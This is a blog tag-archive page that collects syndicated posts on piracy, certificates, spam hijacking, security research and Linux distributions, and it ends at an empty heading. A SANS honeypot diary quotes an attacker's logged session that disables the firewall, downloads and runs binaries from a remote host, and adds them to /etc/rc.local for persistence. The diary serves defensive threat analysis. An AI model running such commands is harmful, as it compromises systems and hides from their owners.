Posts tagged ‘research’

TorrentFreak: Fail: MPAA Makes Legal Content Unfindable In Google

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

The entertainment industries have gone head to head with Google in recent months, demanding tougher anti-piracy measures from the search engine.

According to the MPAA and others, Google makes it too easy for its users to find pirated content. Instead, they would prefer Google to downrank sites such as The Pirate Bay from its search results or remove them entirely.

A few weeks ago Google took additional steps to decrease the visibility of pirated content, but the major movie studios haven’t been sitting still either.

Last week the MPAA announced the launch of WhereToWatch.com, a website that lists where movies and TV shows can be watched legally.

“WheretoWatch.com offers a simple, streamlined, comprehensive search of legitimate platforms – all in one place. It gives you the high-quality, easy viewing experience you deserve while supporting the hard work and creativity that go into making films and shows,” the MPAA’s Chris Dodd commented.

At first glance WhereToWatch offers a rather impressive database of entertainment content. It even features TorrentFreak TV, although this is listed as “not available” since the MPAA’s service doesn’t index The Pirate Bay.

Overall, however, it’s a decent service. WhereToWatch could also be an ideal platform to beat pirate sites in search results, something the MPAA desperately wants to achieve.

Sadly for the MPAA that is only a “could” since Google and other search engines currently have a hard time indexing the site. As it turns out, the MPAA’s legal platform isn’t designed with even the most basic SEO principles in mind.

For example, when Google visits the movie overview page, all links to individual pages are hidden behind JavaScript, so the search engine sees none of them. As a result, movie and TV-show pages in the MPAA’s legal platform are invisible to Google.

Google currently indexes only one movie page, which was most likely indexed through an external link. With Bing the problem is just as bad.


It’s worth noting that WhereToWatch doesn’t block search engines from spidering its content through the robots.txt file. It’s just the coding that makes it impossible for search engines to navigate and index the site.
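As a rough illustration of the indexing problem, here is a minimal sketch (not the MPAA’s code, and the URL is only a placeholder) of how one might check how many links a crawler that does not execute JavaScript actually sees on a page:

import urllib.request
from html.parser import HTMLParser

class LinkCollector(HTMLParser):
    # Collects href values from <a> tags present in the raw HTML,
    # i.e. the links a non-JavaScript crawler can follow.
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.links.append(href)

def crawlable_links(url):
    # Fetch the raw HTML the way a simple crawler would: no JavaScript execution.
    with urllib.request.urlopen(url) as resp:
        html = resp.read().decode("utf-8", errors="replace")
    parser = LinkCollector()
    parser.feed(html)
    return parser.links

if __name__ == "__main__":
    links = crawlable_links("https://wheretowatch.com/")  # placeholder URL
    print(len(links), "links visible without JavaScript")

Run against an overview page whose links are injected purely by client-side JavaScript, a check like this reports few or no links, which is essentially the situation described here.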

This is a pretty big mistake, considering that the MPAA has repeatedly hammered Google over featuring more legal content. With some proper search engine optimization (SEO) advice the group can probably fix the problem in the near future.

Google has previously offered SEO tips to copyright holders, but it’s obvious that the search engine wasn’t consulted on this project.

To help the MPAA on its way we asked isoHunt founder Gary Fung for some input. Last year Fung lost his case to the MPAA, forcing him to shut down the site, but he was glad to offer assistance nonetheless.

“I suggest MPAA optimize for search engine keywords such as ‘download ‘ and ‘torrent ‘. For some reason when people google for movies, that’s what they actually search for,” Fung tells us.

A pretty clever idea indeed, as the MPAA’s own research shows that pirate-related search terms are often used to “breed” new pirates.

Perhaps it’s an idea for the MPAA to hire Fung or other “industry” experts for some more advice. Or better still, just look at how the popular pirate sites have optimized their sites to do well in search engines, and steal their work.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

LWN.net: EFF: Let’s Encrypt

This post was syndicated from: LWN.net and was written by: ris. Original post: at LWN.net

The Electronic Frontier Foundation (EFF) is helping to launch a new non-profit organization that will offer free server certificates beginning in summer 2015. “Let’s Encrypt is a new free certificate authority, which will begin issuing server certificates in 2015. Server certificates are the anchor for any website that wants to offer HTTPS and encrypted traffic, proving that the server you are talking to is the server you intended to talk to. But these certificates have historically been expensive, as well as tricky to install and bothersome to update. The Let’s Encrypt authority will offer server certificates at zero cost, supported by sophisticated new security protocols. The certificates will have automatic enrollment and renewal, and there will be publicly available records of all certificate issuance and revocation.” Let’s Encrypt will be overseen by the Internet Security Research Group (ISRG), a California public benefit corporation.

TorrentFreak: MPAA Pays University $1,000,000 For Piracy Research

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

Last week the MPAA submitted its latest tax filing covering 2013. While there are few changes compared to previous years there is one number that sticks out like a sore thumb.

The movie industry group made a rather sizable gift of $912,000 to Carnegie Mellon University, a figure that neither side has made public before.

This brings the MPAA’s total investment in the University over the past two years to more than a million dollars.

The money in question goes to the University’s “Initiative for Digital Entertainment Analytics” (IDEA), which researches various piracy-related topics. During 2012 the MPAA also contributed to the program, albeit a significantly smaller $100,000.

TF contacted IDEA co-director Rahul Telang, who told us that much of the money is spent on hiring researchers, buying data from third parties, and covering other research-related expenses.

“For any substantial research program to progress it needs funding, and needs access to data and important stakeholders who care about this research. IDEA center has benefited from this funding significantly,” he says, emphasizing that the research adheres to academic standards.

“All research is transparent, goes through academic peer review, and published in various outlets,” Telang adds.

While IDEA’s researchers operate independently, without an obligation to produce particular studies, their output thus far is in line with Hollywood’s agenda.

One study showed that the Megaupload shutdown boosted digital sales while another reviewed academic literature to show that piracy mostly hurts revenues. The MPAA later used these results to discredit an independent study which suggested that Megaupload’s closure hurt box office revenues.

Aside from countering opponents in the press, the MPAA also uses the research to convince lawmakers that tougher anti-piracy measures are warranted.

Most recently, an IDEA paper showed that search engines can help to diminish online piracy, an argument the MPAA has been hammering on for years.

The tax filing, picked up first by Variety, confirms a new trend of the MPAA putting more money into research. Earlier this year the industry group launched a new initiative offering researchers a $20,000 grant for projects that address various piracy related topics.

The MPAA sees academic research as an important tool in its efforts to ensure that copyright protections remain in place, or are strengthened if needed.

“We want to enlist the help of academics from around the world to provide new insight on a range of issues facing the content industry in the digital age,” MPAA CEO and former U.S. Senator Chris Dodd said at the time.

The movie industry isn’t alone in funding research for ‘political’ reasons. Google, for example, heavily supports academic research on copyright-related projects in part to further its own agenda, as do many other companies.

With over a million dollars in Hollywood funding in their pocket, it’s now up to IDEA’s researchers to ensure that their work is solid.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Schneier on Security: The NSA’s Efforts to Ban Cryptographic Research in the 1970s

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

New article on the NSA’s efforts to control academic cryptographic research in the 1970s. It includes new interviews with public-key cryptography inventor Martin Hellman and then-NSA director Bobby Inman.

Schneier on Security: Pew Research Survey on Privacy Perceptions

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Pew Research has released a new survey on Americans’ perceptions of privacy. The results are pretty much in line with all the other surveys on privacy I’ve read. As Cory Doctorow likes to say, we’ve reached “peak indifference to surveillance.”

TorrentFreak: Internet Pirates Always a Step Ahead, Aussies Say

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

As the debate over Internet piracy sizzles Down Under, groups on all sides continue to put forward arguments on how to solve this polarizing issue.

The entertainment industries are clear. The current legal framework in Australia is inadequate in today’s market and tough new legislation is required to deter pirates and hold service providers more responsible for the actions of their users.

ISPs, on the other hand, are generally concerned at the prospect of greater copyright liability, with many viewing content availability at a fair price as the sustainable way to solve the piracy problem.

In order to better understand the opinions of consumers, Aussie telecoms association the Communications Alliance has conducted a new study, the results of which were published this morning.

The survey, carried out among a sample of 1,500 Australians, reveals a public split roughly 50/50 on whether piracy is “a problem,” but one that also believes it will eventually end up paying the bill for solving it.

A recurring explanation for the prevalence of piracy in Australia is the lack of content availability at a fair price, and the results of the survey appear to back up that belief. A total of 60% of respondents said that improved entertainment product release strategies would lead to less piracy, while 66% noted that cheaper, fairer pricing could achieve the same.

Just 19% felt that Government regulation resulting in stiff penalties for file-sharers would do the trick, and when it comes to pushing anti-piracy responsibilities onto service providers, almost three-quarters felt the approach would be ineffective.

Unsurprisingly the issue of cost is important for consumers, with 69% holding the opinion that “identifying, monitoring and punishing” ‘pirate’ subscribers would eventually lead to more expensive Internet bills for everyone. When questioned, 60% of respondents felt that the bill for dealing with piracy should be paid by the rightsholders.

Privacy was also an issue for 65% of respondents who said that monitoring Internet users’ downloading habits would have “serious privacy implications.” However, the most popular reason for not shifting responsibility to ISPs is the fact that pirates are always a step ahead, with 72% believing that given rapidly changing technology, a way around any technical measures will always be found.

“This research comes as the Government considers responses to its discussion paper on online copyright policy options. It paints a picture not of a nation of rampant pirates, but rather a majority of people who agree that action taken should include steps to reduce the market distortions that contribute to piracy,” commented Communications Alliance CEO, John Stanton.

While the entertainment companies have their tough demands and the ISPs have their objections, it seems likely that a solution will be found in the middle ground. Better pricing and availability will have an effect on the market, while educational campaigns will help to sway some of those sitting on the fence. A total of 59% of respondents favored the latter approach.

Whether ISPs will have to play a more active role remains to be seen, but given developments in the UK and United States, a notice-and-notice scheme to warn and educate consumers seems particularly likely.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

lcamtuf's blog: Exploitation modelling matters more than we think

This post was syndicated from: lcamtuf's blog and was written by: Michal Zalewski. Original post: at lcamtuf's blog

Our own Krzysztof Kotowicz put together a pretty neat site called the Bughunter University. The first part of the site deals with some of the most common non-qualifying issues that are reported to our Vulnerability Reward Program. The entries range from mildly humorous to ones that still attract some debate; it’s a pretty good read, even if just for the funny bits.

Just as interestingly, the second part of the site also touches on topics that go well beyond the world of web vulnerability rewards. One page in particular deals with the process of thinking through, and then succinctly and carefully describing, the hypothetical scenario surrounding the exploitation of the bugs we find – especially if the bugs are major, novel, or interesting in any other way.

This process is often shunned as unnecessary; more often than not, I see this discussion missing, or done in a perfunctory way, in conference presentations, research papers, or even the reports produced as the output of commercial penetration tests. That’s unfortunate: we tend to be more fallible than we think we are. The seemingly redundant exercise in attack modelling forces us to employ a degree of intellectual rigor that often helps spot fatal leaps in our thought process and correct them early on.

Perhaps the most common fallacy of this sort is the construction of security attacks that fully depend on the exposure to pre-existing risks of a magnitude that is comparable or greater than the danger posed by the new attack. Familiar examples of this trend may include:

  • Attacks on account data that can be performed only if the attacker already has shell-level access to said account. Some of the research in this category deals with the ability to extract HTTP cookies by examining process memory or disk, or to backdoor the browser by placing a DLL in a directory not accessible to other UIDs. Other publications may focus on exploiting buffer overflows in non-privileged programs through a route that is unlikely to ever be exposed to the outside world.

  • Attacks that require physical access to brick or otherwise disable a commodity computing device. After all, in almost all cases, having the attacker bring a hammer or wire cutters will work just as well.

  • Web application security issues that are exploitable only against users who are using badly outdated browsers or plugins. Sure, the attack may work – but so will dozens of remote code execution and SOP bypass flaws that the client software is already known to be vulnerable to.

  • New, specific types of attacks that work only against victims who already exhibit behaviors well-understood to carry unreasonable risk – say, the willingness to retype account credentials without looking at the address bar, or to accept and execute unsolicited downloads.

  • Sleight-of-hand vectors that assume, without explaining why, that the attacker can obtain or tamper with some types of secrets (e.g., capability-bearing URLs), but not others (e.g., user’s cookies, passwords, server’s private SSL keys), despite their apparent similarity.

Some theorists argue that security issues exist independently of exploitation vectors, and that they must be remedied regardless of whether one can envision a probable attack vector. Perhaps this distinction is useful in some contexts – but it is still our responsibility to precisely and unambiguously differentiate between immediate hazards and more abstract thought experiments of that latter kind.

SANS Internet Storm Center, InfoCON: green: Lessons Learned from attacks on Kippo honeypots, (Mon, Nov 10th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A number of my fellow Handlers have discussed Kippo [1], an SSH honeypot that can record adversarial behaviour, be it human or machine. Normal behaviour against my set of Kippo honeypots is randomly predictable: a mixture of known-bad IP ranges, researchers, scanning and probing from behind Tor, and would-be attackers manually entering information from their jump boxes or home machines.

What caught my eye was a number of separate brute force attacks that succeeded and then manifested the same behaviour, all within a single day. Despite the IP addresses of the scans, the pickup file locations and the downloaded file names being different, the captured scripts from the Kippo logs and, more importantly in this case, the hashes were identical for the two files [2] [3] that were retrieved and attempted to run on Kippo’s fake system.

“So what?” you may ask. I like to draw lessons learned from this type of honeypot interaction; they help provide tactical and operational intelligence that can be passed to other teams to use. Don’t limit this type of information gathering to just the security teams: for example, our friends in audit and compliance need to know what common usernames and passwords are being used in these types of attacks, to keep their guidance current and well advised. If your organisation is running internet-facing Linux systems with SSH on TCP port 22, a single-line note on a daily report to the security stakeholders may be in order, for awareness.

Here are some of the lessons I noted that would be passed to the security team.

1) The password 12345 isn’t very safe, who knew? (implied sarcasm)
2) The attack was a scripted session with no error checking (see the recorded commands below)
3) The roughly two hours of attacks from each unique IP address show a lack of centralised command and control
4) The malware dropped was being reported in VirusTotal a day before I submitted my copies, so this is most likely a relatively new set of scans and attacks
5) The target of the attack is to compromise Linux systems
6) The adversary’s file-hosting locations are Windows systems based in China running HFS v2.3c 291 [4], a free Windows web server, on port 8889; that version has a known remote command execution flaw the owner should probably look at patching
7) Running static or dynamic analysis of the captured Linux binaries provided a wealth of further indicators
8) The IP addresses of the scanning and hosting servers
9) And a nice list of usernames and passwords to be added to the “never, ever use these for anything” list (root/root, root/password, admin/admin, etc.)

I’d normally offer up any captured binaries for further analysis, if the teams have the capacity to do this, or run them through an automated sandbox like Cuckoo [5] to pick out the more obvious indicators of compromise or further pieces of information to research (especially hard-coded commands, IP addresses, domain names, etc.).
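As a concrete illustration of the credential lists mentioned above, here is a rough sketch of pulling attempted usernames and passwords out of a Kippo log for that kind of report. The log path and the “login attempt [user/pass]” line format are assumptions based on a default Kippo install, so adjust both for your own setup.

import re
from collections import Counter

# Matches Kippo's "login attempt [user/password] succeeded|failed" log lines
# (assumed format; verify against your own kippo.log).
LOGIN_RE = re.compile(r"login attempt \[([^/\]]*)/([^\]]*)\] (succeeded|failed)")

def credential_counts(path="log/kippo.log"):
    counts = Counter()
    with open(path, errors="replace") as fh:
        for line in fh:
            match = LOGIN_RE.search(line)
            if match:
                user, password, _result = match.groups()
                counts[(user, password)] += 1
    return counts

if __name__ == "__main__":
    # Print the ten most frequently attempted username/password pairs.
    for (user, password), hits in credential_counts().most_common(10):
        print(hits, user + "/" + password)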

If you have any other comments on how to make honeypot collections relevant, please drop me a line!

Recorded commands by Kippo:
service iptables stop
wget hxxp://x.x.x.x:8889/badfile1
chmod u+x badfile1
./badfile1
cd /tmp
/tmp# wget hxxp://x.x.x.x:8889/badfile2
chmod u+x badfile2
./badfile2
bash: ./badfile2: command not found
/tmp# cd /tmp
/tmp# echo cd /root/ >> /etc/rc.local
/tmp# echo ./badfile1 >> /etc/rc.local
/tmp# echo ./badfile2 >> /etc/rc.local
/tmp# echo /etc/init.d/iptables stop >> /etc/rc.local

[1] Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker. https://github.com/desaster/kippo

[2] File hash 1 0601aa569d59175733db947f17919bb7 https://www.virustotal.com/en/file/22ec5b35a3b99b6d1562becb18505d7820cbcfeeb1a9882fb7fc4629f74fbd14/analysis/
[3] File hash 2 60ab24296bb0d9b7e1652d8bde24280b https://www.virustotal.com/en/file/f84ff1fb5cf8c0405dd6218bc9ed1d3562bf4f3e08fbe23f3982bfd4eb792f4d/analysis/

[4] http://sourceforge.net/projects/hfs/
[5] http://www.cuckoosandbox.org/

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Krebs on Security: Still Spamming After All These Years

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

A long trail of spam, dodgy domains and hijacked Internet addresses leads back to a 37-year-old junk email purveyor in San Diego who was the first alleged spammer to have been criminally prosecuted 13 years ago for blasting unsolicited commercial email.

Last month, security experts at Cisco blogged about spam samples caught by the company’s SpamCop service, which maintains a blacklist of known spam sources. When companies or Internet service providers learn that their address ranges are listed on spam blacklists, they generally get in touch with the blacklister to determine and remediate the cause for the listing (because usually at that point legitimate customers of the blacklisted company or ISP are having trouble sending email).

In this case, a hosting firm in Ireland reached out to Cisco to dispute being listed by SpamCop, insisting that it had no spammers on its networks. Upon investigating further, the hosting company discovered that the spam had indeed come from its Internet addresses, but that the addresses in question weren’t actually being hosted on its network. Rather, the addresses had been hijacked by a spam gang.

Spammers sometimes hijack Internet address ranges that go unused for periods of time. Dormant or “unannounced” address ranges are ripe for abuse partly because of the way the global routing system works: Miscreants can “announce” to the rest of the Internet that their hosting facilities are the authorized location for given Internet addresses. If nothing or nobody objects to the change, the Internet address ranges fall into the hands of the hijacker (for another example of IP address hijacking, also known as “network identity theft,” check out this story I wrote for The Washington Post back in 2008).
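For readers curious how one might spot whether an address block is currently being announced, and by whom, here is a minimal sketch that queries RIPEstat’s public routing-status data call. The endpoint URL and the structure of the returned JSON are assumptions to check against RIPEstat’s documentation, and the prefix below is only a placeholder.

import json
import urllib.parse
import urllib.request

def routing_status(prefix):
    # Query RIPEstat's routing-status data call for the given prefix
    # (assumed endpoint; see stat.ripe.net for the authoritative docs).
    url = ("https://stat.ripe.net/data/routing-status/data.json?resource="
           + urllib.parse.quote(prefix))
    with urllib.request.urlopen(url) as resp:
        return json.load(resp)

if __name__ == "__main__":
    status = routing_status("192.0.2.0/24")  # placeholder prefix (TEST-NET-1)
    # Inspect the "data" section for visibility and origin information; a
    # normally dormant block that suddenly shows an unfamiliar origin AS is
    # the hijack pattern described above.
    print(json.dumps(status.get("data", {}), indent=2))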

So who’s benefitting from the Internet addresses wrested from the Irish hosting company? According to Cisco, the addresses were hijacked by Mega-Spred and Visnet, hosting providers in Bulgaria and Romania, respectively. But what of the spammers using this infrastructure?

One of the domains promoted in the spam that caused this ruckus — unmetegulzoo[dot]com — leads to some interesting clues. It was registered recently by a Mike Prescott in San Diego, to the email address mikeprescott7777@gmail.com. That email was used to register more than 1,100 similarly spammy domains that were recently seen in junk email campaigns (for the complete list, see this CSV file compiled by DomainTools.com).

Enter Ron Guilmette, an avid anti-spam researcher who tracks spammer activity not by following clues in the junk email itself but by looking for patterns in the way spammers use the domains they’re advertising in their spam campaigns. Guilmette stumbled on the domains registered to the Mike Prescott address while digging through the registration records on more than 14,000 spam-advertised domains that were all using the same method (Guilmette asked to keep that telltale pattern out of this story so as not to tip off the spammers, but I have seen his research and it is solid).

Of the 5,000 or so domains in that bunch that have accessible WHOIS registration records, hundreds of them were registered to variations on the Mike Prescott email address and to locations in San Diego. Interestingly, one email address found in the registration records for hundreds of domains advertised in this spam campaign was registered to a “michaelp77x@gmail.com” in San Diego, which also happens to be the email address tied to the Facebook account for one Michael Persaud in San Diego.
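As a toy illustration of the registrant grouping described above, here is a short sketch that counts how many domains in a CSV share each registrant email address. The file name and column names (“domain”, “registrant_email”) are assumptions for illustration, not the actual format of the DomainTools export.

import csv
from collections import Counter

def domains_per_registrant(path="spam_domains.csv"):
    # Count domains per registrant email from a CSV with assumed columns
    # "domain" and "registrant_email".
    counts = Counter()
    with open(path, newline="") as fh:
        for row in csv.DictReader(fh):
            email = (row.get("registrant_email") or "").strip().lower()
            if email:
                counts[email] += 1
    return counts

if __name__ == "__main__":
    # Registrant addresses tied to hundreds of throwaway domains stand out fast.
    for email, total in domains_per_registrant().most_common(20):
        print(total, email)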

Persaud is an unabashed bulk emailer who’s been sued by AOL, the San Diego District Attorney’s office and by anti-spam activists multiple times over the last 15 years. Reached via email, Persaud doesn’t deny registering the domains in question, and admits to sending unsolicited bulk email for a variety of “clients.” But Persaud claims that all of his spam campaigns adhere to the CAN-SPAM Act, the main anti-spam law in the United States — which prohibits the sending of spam that spoofs the sender’s address or that does not give recipients an easy way to opt out of receiving future such emails from that sender.

As for why his spam was observed coming from multiple hijacked Internet address ranges, Persaud said he had no idea.

“I can tell you that my company deals with many different ISPs both in the US and overseas and I have seen a few instances where smaller ones will sell space that ends up being hijacked,” Persaud wrote in an email exchange with KrebsOnSecurity. “When purchasing IP space you assume it’s the ISP’s to sell and don’t really think that they are doing anything illegal to obtain it. If we find out IP space has been hijacked we will refuse to use it and demand a refund. As for this email address being listed with domain registrations, it is done so with accordance with the CAN-SPAM guidelines so that recipients may contact us to opt-out of any advertisements they receive.”

Guilmette says he’s not buying Persaud’s explanation of events.

“He’s trying to make it sound as if IP address hijacking is a very routine sort of thing, but it is still really quite rare,” Guilmette said.

The anti-spam crusader says the mere fact that Persaud has admitted that he deals with many different ISPs both in the US and overseas is itself telling, and typical of so-called “snowshoe” spammers — junk email purveyors who try to avoid spam filters and blacklists by spreading their spam-sending systems across a broad swath of domains and Internet addresses.

“The vast majority of all legitimate small businesses ordinarily just find one ISP that they are comfortable with — one that provides them with decent service at a reasonable price — and then they just use that” to send email, Guilmette said. “Snowshoe spammers who need lots of widely dispersed IP space do often obtain that space from as many different ISPs, in the US and elsewhere, as they can.”

Persaud declined to say which companies or individuals had hired him to send email, but cached copies of some of the domains flagged by Cisco show the types of businesses you might expect to see advertised in junk email: payday loans, debt consolidation services, and various nutraceutical products.

In 1998, Persaud was sued by AOL, which charged that he committed fraud by using various names to send millions of get-rich-quick spam messages to America Online customers. In 2001, the San Diego District Attorney’s office filed criminal charges against Persaud, alleging that he and an accomplice crashed a company’s email server after routing their spam through the company’s servers. In 2000, Persaud admitted to one felony count (PDF) of stealing from the U.S. government, after being prosecuted for fraud related to some asbestos removal work that he did for the U.S. Navy.

Many network operators remain unaware of the threat of network address hijacking, but as Cisco notes, network administrators aren’t completely helpless in the fight against network-hijacking spammers: Resource Public Key Infrastructure (RPKI) can be leveraged to prevent this type of activity. Another approach known as DNSSEC can also help.

SANS Internet Storm Center, InfoCON: green: 20$ is 999999 Euro, (Tue, Nov 4th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Newcastle (UK) University researchers claim to have found an exploit for the contactless payment feature of Visa cards. One of the fraud prevention features of these cards is that only small amounts can be charged in touch mode, without requiring a PIN. But the researchers say that simply changing the currency seems to evade these precautions completely, and they built a fake POS terminal into a smart phone that apparently can swipe money from unsuspecting victims just by getting close enough to their wallet.

According to the press release, Visa’s response was that they believe the results of this research could not be replicated outside a lab environment. Unfortunately, there ain’t too many cases in security engineering history where such a claim held for more than a day or three. If this attack turns out to be true and usable in real life, Visa’s design will go down in the annals of engineering screwups on par with NASA’s Mars Climate Orbiter, where the trajectory was computed in inches and feet while the thruster logic expected metric information.

Needless to say, the latter episode didn’t end all that well.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

SANS Internet Storm Center, InfoCON: green: CSAM Month of False Positives: Appropriately Weighting False and True Positives, (Fri, Oct 31st)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

This is a guest diary submitted by Chris Sanders. We will gladly forward any responses, or please use our comment/forum section to comment publicly.

If you work with any type of IDS, IPS, or other detection technology then you have to deal with false positives. One common mistake I see people make when managing their indicators and rules is relying solely on the rate of false positives that are observed. While false positive rate is an important data point, it doesn’t encompass everything you should consider when evaluating the effectiveness of a rule or indicator. For instance, consider a scenario where you have a rule that looks for a specific byte sequence in outbound traffic:

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Random Malware"; content:"|AB BF 09 B7|";)

You can see that this rule isn’t incredibly specific, as it examines all TCP traffic for four specific outbound bytes. As a result, there might be potential for false positives here. In this case, I ran this rule on a large network over the course of a month, and it generated 58 false positive alerts. Using that data point alone, it sounds like this rule might not be too effective. As a matter of fact, I had a few people ask me if I could disable the rule. However, I didn’t, because I also considered the number of true positive alerts generated from this rule. Over the same period of time this rule generated 112 true positive alerts. This means that the rule was effective at catching what it was looking for, but it still wasn’t especially precise.

I mention the word precise because the false positive and true positive data points can be combined to form a precision statistic using the formula P = TP / (TP + FP). This value, expressed as a percentage, can be used to describe exactly how precise a rule is, with higher values being more desirable. In the case of our example rule, the rule has 65.9% precision, meaning that it successfully detected what it was looking for 65.9% of the time. That doesn’t sound like a rule that should be disabled to me. Instead, I was able to conduct more research and further tune the rule.

When examining rules and indicators for their effectiveness, be sure to consider both true and false positives. You might miss out on favorable detection if you don’t.

Blog: http://www.chrissanders.org
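For readers who want to play with the numbers, here is a one-function sketch of the precision statistic described above, using the diary’s example counts of 112 true positives and 58 false positives (the function name is mine, not from the original diary).

def precision(true_positives, false_positives):
    # P = TP / (TP + FP), returned as a fraction between 0 and 1.
    total = true_positives + false_positives
    return true_positives / total if total else 0.0

if __name__ == "__main__":
    p = precision(112, 58)
    print("Rule precision: {:.1%}".format(p))  # roughly 65.9%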

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Linux How-Tos and Linux Tutorials: How to Find the Best Linux Distribution for a Specific Task

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jack Wallen. Original post: at Linux How-Tos and Linux Tutorials


If you’re looking for a Linux distribution to handle a specific (even niche) task, there most certainly is a distribution ready to serve. From routers to desktops, from servers to multi-media…there’s a Linux for everything.

With such a wealth of Linux distributions available, where do you start looking when you have a specific task in mind? You start here, with this listing of some task-specific Linux distributions. The intent here isn’t to create an exhaustive list, but to get users pointed in the right direction. For an exhaustive listing of Linux distributions, check out Distrowatch.

Desktop

The task of everyday usage could easily fall to one of many Linux distributions. In fact, most every Linux distribution can handle everyday, desktop use. From internet browsing/work to desktop publishing, social networks…everything you need for getting things done. The choice made will often depend on what type of interface you want (since nearly every distribution can run the apps you need). Are you looking for a more modern, touch-friendly interface? If so, go with Ubuntu and its Unity interface or Fedora and GNOME.

Since the list of desktop distributions is so extensive, here is a list of some of the top distributions and why they should be considered:

  • Ubuntu: Hardware support, touch-friendly interface

  • Mint: One of the most user-friendly distributions available

  • Deepin: Outstanding interface and user-friendly

  • Bodhi: Unique interface, lightweight distribution (also works well on Chromebooks)

  • Arch Linux: A full-featured desktop distribution that focuses on simplicity. 

Audio/Video engineering

When people think of audio/video, they tend to immediately default to Mac. Linux also excels in that playground. With full-blown distributions dedicated specifically to audio/video engineering, you won’t miss a beat or a scene. If you work with multi-media and Linux, you already know there are plenty of tools available (Lightworks, Audacity, Ardour, etc). What you might not know is that there are distributions available that come with everything you need to rock, preinstalled.

So if you’re looking to get your audio or video ready for performance or distribution, take a look at any of these flavors of Linux:

Ubuntu Studio: This is the most widely used multimedia-oriented Linux-based operating system. What is very nice about Ubuntu Studio is that it is optimized, from the kernel up, to be perfectly suited for the high demands made by audio/video editing/creation. The distribution is based on Ubuntu and the desktop is XFCE, so you can be sure it won’t take much from memory or CPU…so it’s all there for your tasks.

Dream Studio: Takes a very similar approach to Ubuntu Studio — with many of the same tools. The primary difference is that Dream Studio uses the Unity interface, for a more modern (and touch-friendly) look.


Penetration testing

Although just about any Linux distribution can be used (or tweaked to be used) for this purpose, there are distributions specifically designed to test the security of your network through penetration testing. One of the best distributions you’ll find for this purpose is Kali Linux. This particular take on the Linux distribution incorporates more than 300 penetration testing and security tools to create one of the finest security-minded distributions available. With Kali you can simulate attacks on your network to see exactly what you need to protect your company’s precious data. You’ll find apps like Metasploit (for network penetration testing), Nmap (for port and vulnerability scanning), Wireshark (for network monitoring), and Aircrack-Ng (for testing wireless security).

Development

Most Linux distributions are well-built for development. You’ll find all of the tools available to all distributions. There is, however, one consideration you’ll want to take into account. With versioned distributions (such as Ubuntu), you’ll find updates to developer-crucial packages (such as PHP) often lag well behind rolling release distributions. The top rolling release distributions are:

Enterprise Servers

If you’re looking to serve up large, high-demand websites, or power the backend of your business, there are Linux distributions ready to serve. You can go the fully supported, somewhat proprietary route, like Red Hat Enterprise Linux, or the fully free route with CentOS. What’s important with RHEL is that, when you make your purchase, you can also count on enterprise-grade support. For some companies, that level of support is mission-critical.

Of course, Red Hat isn’t the only game when it comes to fully supported enterprise-grade Linux. There’s also SUSE Linux Enterprise — for both servers and desktops. But that’s not all. You’ll find plenty of enterprise-ready servers in these distributions:

  • CentOS: The free, open source version of Red Hat Enterprise Server

  • Zentyal: A drop-in replacement for Windows Small Business Server. 

System Troubleshooting

If you’re looking to troubleshoot a PC system, a Windows installation, a hard drive, or even retrieve data from a problematic Windows PC, Linux is what you turn to. There are plenty of Linux distributions geared toward troubleshooting a system. Some of the best include:

  • Knoppix: A bootable Live CD (or USB) distribution that offers plenty of diagnostic tools.

  • Ultimate Boot CD: This is the tool you want when you need to do serious hardware diagnosis (from memory, to CPU, to hard drive, peripherals, and more). With UBCD you can also do data recovery and partitioning.

  • SystemRescueCD: This distribution offers plenty of tools focused on system and data rescue.

Education

Linux also excels in the world of education. With tools like Moodle, ITALC, Claroline, and more — Linux has a firm grasp on the needs of education. And like every other niche, there are distributions geared specifically for the world of education. Two of the more popular distributions are:

  • Edubuntu: This is a partner project for Ubuntu Linux. The aim of Edubuntu is to help the educator with limited computer knowledge make use of Linux’ power, stability, and flexibility within the classroom or the home.

  • UberStudent: Aimed at secondary and higher education, UberStudent is a complete, out-of-the-box learning platform. UberStudent was developed by a professional educator who specializes in academic success strategies, post-secondary literacy instruction, and educational technology.

Router

If you’d like to replace the firmware on your current router with a more robust and secure solution, look no further than Linux. By flashing your router with a Linux distribution, you’ll find you enjoy more features and more control over your network experience. Of course, not all routers are flashable with Linux — so you’ll need to do a bit of research on your hardware. If your router is supported, look to these two major projects as your first steps toward more freedom with your network routing.

DD-wrt: This flavor offers tons of features and a very easy interface to help you control those features. You’ll also find plenty of documentation for DD-wrt.

OpenWRT: This is a Linux distribution for embedded devices, including routers. As with any router firmware, you’ll be able to control NAT, DHCP, DNS, and more.

Firewall

